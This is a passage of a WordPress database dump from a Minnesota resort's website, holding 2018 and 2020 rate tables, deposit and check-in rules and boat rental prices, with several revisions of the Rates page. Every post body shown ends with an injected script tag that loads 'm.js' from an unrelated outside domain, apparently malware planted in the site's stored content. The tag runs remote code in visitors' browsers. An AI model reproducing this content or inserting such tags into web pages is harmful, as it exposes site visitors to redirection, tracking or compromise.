Motel\",\"1\",\"$110.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$220.00\",\"$250.00\",\"$1,100.00\",\"$1,275.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Drive Thru sites, elec, water and sewer\",\"1 per site\",\"$60.00\",\"$60.00\",\"$300.00\",\"$300.00\",\"\"],[\"Pets (two pets per campsite)\",\"\",\"$10.00/ Pet\",\"$10.00/ Pet\",\"$50.00/ Pet\",\"$50.00/ Pet\",\"\"],[\"Pet in Cabins or Motel rooms\",\"\",\"$25.00/ Pet\",\"$25.00/ Pet\",\"$125.00/ Pet\",\"$125.00/ Pet\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$25.00\",\"$25.00\",\"$125.00\\n\",\"$125.00\\n\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2020 Rates','Call us at 218-747-2959 for reservations  \nNO checkins after 10:00 PM !!\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  Balance is due upon arrival.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nAll Guests must check in upon arrival. \nWireless Internet Available','publish','closed','closed','','2018-rates','','','2020-02-03 10:10:52','2020-02-03 16:10:52','',0,'http://ashbyresort.com/?post_type=tablepress_table&#038;p=679',0,'tablepress_table','application/json',0),(680,1,'2018-03-31 22:49:39','2018-04-01 03:49:39','[[\"2018\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\",\"1\",\"$80.00\",\"$95.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$100.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$175.00\",\"$225.00\",\"$900.00\",\"$1,100.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$180.00\",\"$230.00\",\"$900.00\",\"$1,100.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$200.00\",\"$250.00\",\"$1,000.00\",\"$1,200.00\",\"8\"],[\"Tent & Popups\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"RV\\/Travel Trailers\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Pets\",\"\",\"$5.00\",\"$5.00\",\"$35.00\",\"$35.00\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$20.00\",\"$20.00\",\"$100.00\\n\",\"$100.00\\n\",\"\"],[\"Suite #9 \\u2013 Cabins #13 & #14 are no smoking and no pets\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2018 Rates','Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available','inherit','closed','closed','','679-revision-v1','','','2018-03-31 22:49:39','2018-04-01 03:49:39','',679,'http://ashbyresort.com/679-revision-v1/',0,'revision','',0),(681,1,'2018-03-31 22:53:09','2018-04-01 03:53:09','<div id=\"pl-681\"  class=\"panel-layout\" ><div id=\"pg-681-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-681-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-681-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018\nBedrooms\nWeekday Nightly\nWeekend Holiday Nightly\nWeekly Sept. – May\nWeekly June – Aug.\nMaximum Capacity\n\nSleepers Motel\n1\n$80.00\n$95.00\n$450.00\n$550.00\n4\nKitchenettes Motel\n1\n$100.00\n$130.00\n$600.00\n$700.00\n4\nSuite 9\n2\n$175.00\n$225.00\n$900.00\n$1,100.00\n4\nCabins (#10 #11 #12)\n2\n$180.00\n$230.00\n$900.00\n$1,100.00\n8\nCabins (#13 #14)\n2\n$200.00\n$250.00\n$1,000.00\n$1,200.00\n8\nTent & Popups\n1 per site\n$35.00\n$35.00\n$180.00\n$180.00\n\nRV/Travel Trailers\n1  per site\n$45.00\n$45.00\n$250.00\n$250.00\n\n\nPets\n\n$5.00\n$5.00\n$35.00\n$35.00\n\n\nAdditional People Camping (Each)\n\n$5.00\n$5.00\n$25.00\n$25.00\n\n\nAdditional People in Motel and Cabins (Each)\n\n$20.00\n$20.00\n$100.00\n$100.00\n\n\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available\nDaily\nWeekly\n\n14\' Lund Boat\n$20.00\n$100.00\n\n15 H.P. 4 Stroke Yamaha Motor\n$30.00\n$150.00\nPlus Gas\nBoat and Motor\n$50.00\n$250.00\nPlus Gas\n\n20\' Pontoon with 25 H.P. Motor\n$125.00\n$450.00\nPlus Gas\nPaddle Boards\n$5.00 per hour\nBoat Lifts\n$20.00\n$100.00\n\nBoat Launching/Docking\n\n\n$5.00 One time Fee\n</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 22:53:10','2018-04-01 03:53:10','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(682,1,'2018-03-31 22:53:10','2018-04-01 03:53:10','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018\nBedrooms\nWeekday Nightly\nWeekend Holiday Nightly\nWeekly Sept. – May\nWeekly June – Aug.\nMaximum Capacity\n\nSleepers Motel\n1\n$80.00\n$95.00\n$450.00\n$550.00\n4\nKitchenettes Motel\n1\n$100.00\n$130.00\n$600.00\n$700.00\n4\nSuite 9\n2\n$175.00\n$225.00\n$900.00\n$1,100.00\n4\nCabins (#10 #11 #12)\n2\n$180.00\n$230.00\n$900.00\n$1,100.00\n8\nCabins (#13 #14)\n2\n$200.00\n$250.00\n$1,000.00\n$1,200.00\n8\nTent & Popups\n1 per site\n$35.00\n$35.00\n$180.00\n$180.00\n\nRV/Travel Trailers\n1  per site\n$45.00\n$45.00\n$250.00\n$250.00\n\n\nPets\n\n$5.00\n$5.00\n$35.00\n$35.00\n\n\nAdditional People Camping (Each)\n\n$5.00\n$5.00\n$25.00\n$25.00\n\n\nAdditional People in Motel and Cabins (Each)\n\n$20.00\n$20.00\n$100.00\n$100.00\n\n\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available\nDaily\nWeekly\n\n14\' Lund Boat\n$20.00\n$100.00\n\n15 H.P. 4 Stroke Yamaha Motor\n$30.00\n$150.00\nPlus Gas\nBoat and Motor\n$50.00\n$250.00\nPlus Gas\n\n20\' Pontoon with 25 H.P. Motor\n$125.00\n$450.00\nPlus Gas\nPaddle Boards\n$5.00 per hour\nBoat Lifts\n$20.00\n$100.00\n\nBoat Launching/Docking\n\n\n$5.00 One time Fee\n</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 22:53:10','2018-04-01 03:53:10','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(683,1,'2018-03-31 22:55:51','2018-04-01 03:55:51','<div id=\"pl-683\"  class=\"panel-layout\" ><div id=\"pg-683-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-683-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-683-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 22:55:51','2018-04-01 03:55:51','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(684,1,'2018-03-31 22:55:52','2018-04-01 03:55:52','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 22:55:52','2018-04-01 03:55:52','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(685,1,'2018-03-31 22:57:04','2018-04-01 03:57:04','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 22:57:04','2018-04-01 03:57:04','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(686,1,'2018-03-31 23:02:04','2018-04-01 04:02:04','<div id=\"pl-686\"  class=\"panel-layout\" ><div id=\"pg-686-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-686-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-686-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div><div id=\"panel-686-0-0-1\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	[table id=1 /]</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 23:02:04','2018-04-01 04:02:04','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(687,1,'2018-03-31 23:02:04','2018-04-01 04:02:04','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div><div id=\"panel-43-0-0-1\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	[table id=1 /]</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 23:02:04','2018-04-01 04:02:04','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(688,1,'2018-03-31 23:08:31','2018-04-01 04:08:31','<div id=\"pl-688\"  class=\"panel-layout\" ><div id=\"pg-688-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-688-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-688-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	[table id=1 /]</div>\n</div></div><div id=\"panel-688-0-0-1\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 23:08:31','2018-04-01 04:08:31','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(689,1,'2018-03-31 23:08:31','2018-04-01 04:08:31','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	[table id=1 /]</div>\n</div></div><div id=\"panel-43-0-0-1\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 23:08:31','2018-04-01 04:08:31','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(690,1,'2018-03-31 23:09:30','2018-04-01 04:09:30','<div id=\"pl-690\"  class=\"panel-layout\" ><div id=\"pg-690-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-690-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-690-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n</div>\n</div></div><div id=\"panel-690-0-0-1\" class=\"so-panel widget widget_sow-editor\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	[table id=1 /]</div>\n</div></div><div id=\"panel-690-0-0-2\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"2\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</div>\n</div></div></div></div><div id=\"pg-690-1\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-690-1-0\"  class=\"panel-grid-cell panel-grid-cell-empty\"  data-weight=\"1\" ></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 23:09:30','2018-04-01 04:09:30','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(691,1,'2018-03-31 23:09:30','2018-04-01 04:09:30','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor 